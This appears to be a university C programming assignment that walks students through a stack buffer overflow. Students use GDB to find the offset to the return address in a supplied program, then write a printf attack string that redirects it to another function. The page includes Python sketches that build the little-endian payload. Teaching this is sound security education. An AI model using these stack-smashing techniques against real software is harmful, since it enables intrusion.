Advanced C Programming

Spring 2023 ECE 264 :: Purdue University

Due 4/29

Buffer overflow

Goals

The goals of this assignment are as follows:
  1. Understand how your compiled C code operates at the instruction level.
  2. Appreciate the value of memory safety to security concerns.
  3. Get a brief introduction to application security at the binary level.

Overview

There are many ways to attack a vulnerable application, that is, to make it behave in a way that the author did not intend and the attacker did. One very common way is the buffer overflow attack. This is possible if a target program takes input from a user and loads it into a buffer (string) without checking whether the buffer is big enough to hold the input.

In this assignment, you are given a vulnerable program, including the source code. Your job is to create a malicious input string that will cause it to call another function.

Your buffer overflow attack will consist of sending an attack string to the program that is longer than the name string buffer, so that it spills junk data all the way to the return address. (See the readings.) You will overwrite the return address with a different address in the code (in the text segment), so that when greet_visitor(…) tries to return, it jumps to scare_visitor(…) instead of jumping back to main(…). Thus, you need to find the number of bytes from the beginning of name to the beginning of the return address. That is the number of filler characters you will have. Then, you will add a few more bytes: the address of the scare_visitor(…) function in memory.

You will not write any C code for HW22. Instead, you will create a very small text file containing an attack string. When the attack string is piped to the target program, it will cause it to do something it wasn't intended to do.

Most of your effort will be to analyze the stack of the target program (and get familiar enough to do so).
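To make the mechanism concrete, here is a minimal Python sketch that models the stack frame of greet_visitor(…) as a flat byte array. Every number in it is an assumption made for illustration: the 16-byte buffer, the 8-byte saved base pointer placed directly above it, and all three addresses. The real layout of boa has to be found in GDB. The helper model_gets is a hypothetical stand-in for gets(…); it copies bytes with no bounds check and appends a null terminator.

```python
import struct

# All sizes and addresses below are made-up values for illustration only.
NAME_SIZE = 16                  # assumed size of the name buffer
ADDR_IN_MAIN = 0x400600         # assumed original return address (inside main)
ADDR_OF_SCARE = 0x400123        # assumed address of scare_visitor


def make_frame():
    """Model the frame from low to high address: name, saved %rbp, return address."""
    name = bytes(NAME_SIZE)
    saved_rbp = struct.pack("<Q", 0x7FFFFFFFE000)
    return_address = struct.pack("<Q", ADDR_IN_MAIN)
    # Eight extra zero bytes model the caller's frame above the return address.
    return bytearray(name + saved_rbp + return_address + bytes(8))


def model_gets(frame, data):
    """Copy input into the frame starting at name[0] with no bounds check."""
    line = data.split(b"\n", 1)[0]          # gets() stops at the first newline
    if len(line) >= len(frame):
        raise ValueError("input is longer than this small model can hold")
    frame[0:len(line)] = line
    frame[len(line)] = 0                    # gets() appends a null terminator
    return frame


def return_address(frame):
    """Read the 8-byte little-endian return address out of the modeled frame."""
    start = NAME_SIZE + 8
    return struct.unpack("<Q", bytes(frame[start:start + 8]))[0]


safe = model_gets(make_frame(), b"Tom\n")
attack = b"Tom\x00" + b"A" * (NAME_SIZE + 8 - 4) + struct.pack("<Q", ADDR_OF_SCARE)
smashed = model_gets(make_frame(), attack)

print(hex(return_address(safe)))     # a short name leaves the return address alone
print(hex(return_address(smashed)))  # the long input replaces it
```

The model only shows why the filler length matters: the address bytes must land exactly on the return address slot, not before or after it.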

Doing the assignment

This assignment is different from the others in ECE 264. Most of what you need to do is just understanding ⓐ the stack, and ⓑ how function calls work. You will do that through two required readings, and a little tinkering in GDB. Once you have done that, creating the attack string takes little additional work.

Learn

  1. Learn how to examine the disassembly of your program in GDB. Read the first half of Understanding C by learning assembly. You can stop reading when you see the heading “understanding static local variables”.
    This blog post is one of the clearest introductions I've found; it doesn't go into too much detail. Also, it ties in nicely with C programming and GDB.
    ≈3 pages (not counting the parts you skip)
  2. Learn how function calls work, and how to read assembly instructions. Read Introduction to x64 assembly language, except the left half of page 2 (about directives). Page 3 (instructions) will help you make sense of the assembly instructions you are seeing, but you won't need to understand deeply.
    ≈3½ pages (not counting the left half of page 2)
  3. Understand how greet_visitor(…) is called in our target program (boa.c). This (PDF walk-through) takes you through each step of the function call. The memory addresses are different from what you will get when you compile and run boa.c, but once you understand this, you will be ready to find the information in the real executable.
  4. Check your understanding. When you are done with the readings, you should be able to answer the following:
    1. What is the disassembly of a program?
    2. What is a register?
    3. What do the base pointer (%rbp) and stack pointer (%rsp) tell us?
    4. What does the instruction pointer (%rip) tell us?
    5. Is %rbp < %rsp or is %rsp < %rbp?
    6. Are local variables at a higher or lower memory address from %rbp?
    7. What happens in the preamble? … and the epilogue?
    8. What does the retq instruction do?
    9. What does the notation -0x8(%rbp) mean?
    10. Where is the return address stored, relative to the base pointer (%rbp)?
  5. You are now ≈80% done with HW22, the last homework for ECE 264. (Until you have done the above, the steps below are likely to be confusing.)

Get acquainted with the target program.

  1. Get the starter files.
    $ 264get hw22
  2. Compile boa.c to create the executable boa. Note that you have to suppress warnings for unused variables and for using gets, because the course gcc alias treats warnings as errors.
    $ gcc -o boa boa.c -Wno-unused-variable -Wno-implicit-function-declaration
  3. Run the target program normally (boa). This is to make sure you understand the normal behavior of the program, so you don't miss the big picture of this assignment.
    $ ./boa
    Hello. What is your name? Tom
    Hello, Tom.

Learn how to pipe input from a file to a program.

  1. Create an input file containing your name and pipe it to boa. Just open your editor, type your name, save, and exit.
    $ vim input.txt
    This command runs boa and uses the contents of input.txt as the input, i.e., in lieu of whatever the user might have typed at the terminal.
    $ ./boa < input.txt
    Hello. What is your name? Hello, Tom.
  2. Create an input file from the command line. The printf command in bash lets you print formatted messages to the terminal using syntax that is vaguely similar to printf(…) in C. Examples:
    $ printf "Tom\n"
    Tom
    You can also specify characters using their hexadecimal codes. For example, "\x41" is the same as "A". Both will emit 1 byte when printed. Likewise, "\x41B\x43" is the same as "A\x42C" is the same as "ABC". All emit 3 bytes when printed. This will be helpful later in this process when you need to print a memory address, which may include bytes that do not correspond to easily typable ASCII characters. For example, the address 0x400123 can be printed with printf "\x23\x01\x40\x00\x00\x00\x00\x00", using little-endian byte order (least significant byte first).
    Let's use this same method to print the name “Tom” again.
    $ printf "\x54\x6f\x6d\n"
    Tom
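The same byte equivalences can be checked outside the shell. The following is a small Python sketch, not part of the assignment workflow. The helper names little_endian_8 and as_printf_escapes are hypothetical, and 0x400123 is simply the example address used above.

```python
import struct

# "\x41" and "A" are the same single byte; mixing the two styles changes nothing.
same_a = b"\x41"
same_abc = b"\x41B\x43"

# The name "Tom" followed by a newline, written with hex escapes.
tom = b"\x54\x6f\x6d\n"


def little_endian_8(address):
    """Return the 8 bytes of a 64-bit address, least significant byte first."""
    return struct.pack("<Q", address)


def as_printf_escapes(data):
    """Format bytes as backslash-x escapes that can be pasted into a bash printf string."""
    return "".join("\\x{:02x}".format(b) for b in data)


print(same_a == b"A", same_abc == b"ABC", len(same_abc))
print(tom.decode("ascii"), end="")
print(as_printf_escapes(little_endian_8(0x400123)))
```

The last line prints the escape sequence for the example address in the same byte order as the printf command shown above.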

Examine the executable (boa)

  1. Start boa in gdb. Set a breakpoint inside greet_visitor(…), just before it returns. In other words, set the breakpoint for the line containing the closing curly brace (}).
  2. Try some GDB commands. At this point, the program boa should be running, and GDB should be paused at the point just before greet_visitor(…) returns. Try a few commands. (We are not showing the output here. You need to try it yourself.)
    (gdb) info registers
    … shows the values in all registers. The only ones we care about are $rbp (base pointer), $rsp (stack pointer), and $rip (instruction pointer).
    (gdb) disassemble /s greet_visitor
    … shows the assembly instructions for greet_visitor(…). The /s flag tells GDB to intersperse the C code lines with the disassembly.
    (gdb) disassemble /s scare_visitor
    … shows the assembly instructions for scare_visitor(…).
    (gdb) disassemble /s main
    … shows the assembly instructions for main(…).
    (gdb) print $rbp
    … prints the value of the base pointer.
  3. Print a hex dump of the current stack frame using the x/ command. We will use a command like x/▒▒bx ▒▒.
    From the readings, you will know that the stack frame begins at $rsp so the command will be x/▒▒bx $rsp.
    But how many bytes do we need to look at? For that, we need to know $rbp - $rsp + 8.
    GDB makes this surprisingly easy.
    (gdb) print $rbp - $rsp + 8
    That should print a number. That's how many bytes we want to look at.
  4. Find the location of the variable name relative to the base pointer. In other words, you need to find the base pointer offset (▒▒▒(%rbp)) of the name variable.
    This may require some fiddling. We are not providing the exact commands. We want you to get a little experience digging around, and thinking about how the stack is arranged.
  5. Find the location of the return address, relative to the base pointer. If you followed the readings carefully, this part will be trivial. Otherwise, just look at the disassembly. You can get it from the assembly instructions and/or from inspecting the hex dump of the stack.
  6. Calculate the distance from name to the return address. Remember: You will be deliberately overflowing the name buffer (string) so that you can overwrite the old return address with your own evil address.
  7. Find the value you will need to write into the return address. The goal is for it to call scare_visitor(…) and print BRAH!!!. Thus, you need to find the address of the instruction to jump to (instead of going back to main(…)).
  8. Write out your attack string on paper. It will consist of a real name (e.g., Tom), followed by some filler bytes, and finally the new (evil) instruction address that you want to overwrite the return address with.
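The arithmetic in the steps above can be sketched in a few lines of Python. The register values and the two operands below are hypothetical placeholders, not the values for boa; substitute whatever your own GDB session shows. The function names are also made up for this sketch.

```python
def frame_dump_size(rbp, rsp):
    """Bytes to show with the x command, mirroring GDB's print $rbp - $rsp + 8."""
    return rbp - rsp + 8


def parse_rbp_offset(operand):
    """Turn an operand such as '-0x10(%rbp)' into the signed integer -16."""
    number = operand.split("(")[0] or "0"   # a bare '(%rbp)' means offset 0
    return int(number, 16)


def distance(name_operand, return_operand):
    """Bytes from name[0] up to the first byte of the return address."""
    return parse_rbp_offset(return_operand) - parse_rbp_offset(name_operand)


# Hypothetical register values and operands, for illustration only.
rbp, rsp = 0x7FFFFFFFE0F0, 0x7FFFFFFFE0D0
print(frame_dump_size(rbp, rsp))
print(distance("-0x10(%rbp)", "0x8(%rbp)"))
```

The distance is the total number of bytes that must come before the new address in the attack string, counting the name and its null byte as well as the filler.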

Create your attack

  1. Create your attack input file: input.txt.
    $ printf "name\x00filler bytes\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒" > input.txt
    Remember that in memory, addresses are stored in little endian byte order, just like the numbers in the BMP file format in images and mtat. For example, the address 0x400123 would be shown as 0x23 0x01 0x40 0x00 0x00 0x00 0x00 0x00 in the memory dump (via the gdb x command). When you craft your attack string, it will need to be little endian, as well.
  2. Test your attack.
    $ ./boa < input.txt
    Hello. What is your name? Hello, Tom.█████████████▓▓▒▒░░BRAH!!! Segmentation fault (core dumped)
    It's okay if you get a segmentation fault. In fact, you will definitely get a segmentation fault. That is one of many rules we are breaking for HW22. As long as it prints “BRAH!!!”, you are done and ready to submit.
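For comparison with the printf command in step 1, here is a hedged Python sketch that assembles the same kind of byte string. The distance (24) and the address (0x400123) are hypothetical; the real values come from your GDB session. build_attack is a made-up helper name, and the sketch writes to a demo file in the temporary directory rather than to the graded input.txt.

```python
import os
import struct
import tempfile


def build_attack(name, distance, target_address):
    """Lay out: name, null byte, filler up to the return address, then the new address."""
    prefix = name + b"\x00"
    if len(prefix) > distance:
        raise ValueError("name does not fit before the return address")
    filler = b"A" * (distance - len(prefix))
    return prefix + filler + struct.pack("<Q", target_address)


# Hypothetical values, for illustration only.
payload = build_attack(b"Tom", 24, 0x400123)
if b"\n" in payload:
    raise ValueError("gets() would stop reading at the newline byte")

# Binary mode ("wb") keeps the bytes exactly as built, with no added newline.
path = os.path.join(tempfile.gettempdir(), "attack_demo.bin")
with open(path, "wb") as f:
    f.write(payload)

print(len(payload), payload.hex())
```

The newline check matters because gets(…) stops at the first newline, so an address or filler that happens to contain the byte 0x0a would be cut short.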

How much work is this?

Expect to spend ≈2 hours reading, ≈1 hour fussing with GDB, and ≈1 hour crafting your attack string. Obviously, your experience may vary.

Pretester

There will be no pretester for HW22. We will test your attack using the command shown in step 2 of “Create your attack” (above), i.e., ./boa < input.txt.

Requirements

  1. Your submission must contain each of the following files, as specified:
    file       contents
    input.txt  attack string
      • Supplying this string to the executable, boa, should cause it to redirect execution to scare_visitor(…), which will print BRAH!!!.
    boa.c      target code
      • Target code, submitted as is with no changes.
      • We will most likely not look at this. It is only a failsafe.
    boa        target executable
      • Compiled target code.
      • This is just the executable that you compiled using gcc.
      • You don't need to do anything except compile what you were given.
      • We will most likely not use this. It is only a failsafe, in case we can't reproduce your attack with ours.

Submit

To submit HW22 from within your hw22 directory, type 264submit HW22 input.txt boa.c boa

We do not plan to use the boa.c and boa you submit. We ask you to submit them only as a failsafe, in case somehow your executable ends up different from ours.

Q&A

  1. Will the addresses of functions always stay the same?
    They are tied to a specific executable file. As long as you don't recompile, they will be the same.
  2. How can you be so sure the addresses won't change?
    The executable file specifies where in memory it should be loaded.
  3. Is there any other way to see the mapping between code and instructions, besides GDB?
    objdump -S --disassemble boa
    This prints everything in the executable, including other supporting code. Our code accounts for only 188 of the 8689 bytes in the boa executable.
    It is also possible to get the assembly from gcc using gcc -S boa.c -o boa.s but this is less useful than objdump or gdb because it does not interleave the C code lines with the assembly.
  4. What if I recompile?
    If you recompile on the same machine with the same compiler, same options, and same boa.c, addresses will not change.
  5. How is the printf bash command related to the printf(…) C function?
    Name only… and a few format conventions (e.g., %d, %s, etc.) that were mimicked by the creators of the printf bash command. For C programmers, it can be handy to be able to format strings using percent codes (e.g., %d) and hexadecimal escape characters (e.g., \x07) from bash.
  6. I am getting the segmentation fault but no "BRAH!!!" message. What's wrong?
    You are on the right track. Most likely, the new return address isn't getting to the right location on the stack.
    Make sure you have the right address for scare_visitor(…), the right offset (distance from name[0] to return address), and corresponding number of filler characters. Also, keep in mind that gets(…) will write a null terminator ('\0') after your input string. Since the return address, when written in little endian, ends with a bunch of zeros, you may want to leave off the last zero in the return address. That way, the null terminator (==0) will simply be overwriting another zero.
  7. What's the best way to see the contents of my input.txt?
    xxd input.txt
  8. Can I edit input.txt in Vim?
    Yes, but you must open Vim in binary mode using the -b flag like this:
    vim -b input.txt
    Without that, Vim (like most editors) automatically adds a newline (\n) at the end of the file, if there isn't already one there. The -b flag tells Vim not to do that.
    To type non-printable ASCII characters (≤31 or ≥127), press Ctrl-V then x then the two digit hex value (e.g., 06).
    Another way to edit a binary file in Vim is to convert it to a hex dump and then back. First open the file in binary mode (vim -b input.txt). Next, enter :%!xxd to convert the current buffer to a hex dump. Make any edits you like, but be sure to keep the hex dump format. Finally, enter :%!xxd -r to convert back from the hex dump to the binary file.
  9. Do I need to add any special flags to gcc when compiling boa.c?
    No. Initially, Prof. Quinn said in lecture that you should add -O0 since it is widely written online that turning off compiler optimizations using that flag is needed to keep the executable stable. Upon some experimentation, that does not seem to be the case. Likewise, it is often reported that for simple buffer overflow attacks like this to work, you must explicitly tell gcc to turn off certain protections. That does not seem to be necessary for our simple case. It works just fine with the default compiler flags that we use in this class (-g -std=c11 -Wall -Wshadow -Wvla -Werror -pedantic).
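For questions 6 and 7, the following Python sketch may help when an attack string segfaults without printing the message. It is only an illustration: hexdump is a rough imitation of the xxd layout, address_written is a hypothetical helper, and the distance (24) and address (0x400123) are made-up values. The helper assumes that any byte of the return address slot not covered by the input already holds zero.

```python
def hexdump(data, width=16):
    """Return an xxd-like listing: offset, hex bytes, then printable ASCII."""
    lines = []
    for start in range(0, len(data), width):
        chunk = data[start:start + width]
        hex_part = " ".join("{:02x}".format(b) for b in chunk)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("{:08x}: {:<{pad}}  {}".format(start, hex_part, text, pad=width * 3 - 1))
    return "\n".join(lines)


def address_written(payload, distance):
    """Address that ends up in the return address slot, counting the terminator.

    Assumption: slot bytes beyond the end of the input are treated as zero.
    """
    line = payload.split(b"\n", 1)[0] + b"\x00"   # gets() drops the newline, adds '\0'
    slot = line[distance:distance + 8].ljust(8, b"\x00")
    return int.from_bytes(slot, "little")


# Hypothetical attack strings, used only to exercise the helpers.
full = b"Tom\x00" + b"A" * 20 + bytes.fromhex("2301400000000000")
short = full[:-1]                      # last zero byte left off, as suggested in question 6
print(hexdump(full))
print(hex(address_written(full, 24)), hex(address_written(short, 24)))
print(hex(address_written(full, 16)))  # wrong distance: filler lands in the slot
```

With the right distance, both the 8-byte and the 7-byte form of the address give the same result, because the terminator supplies the final zero. With the wrong distance, the slot is filled with filler bytes instead, which matches the symptom of a segmentation fault with no message.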

Updates

12/8/2022 Link for Introduction to x64 Assembly - Martin Hirzel was fixed.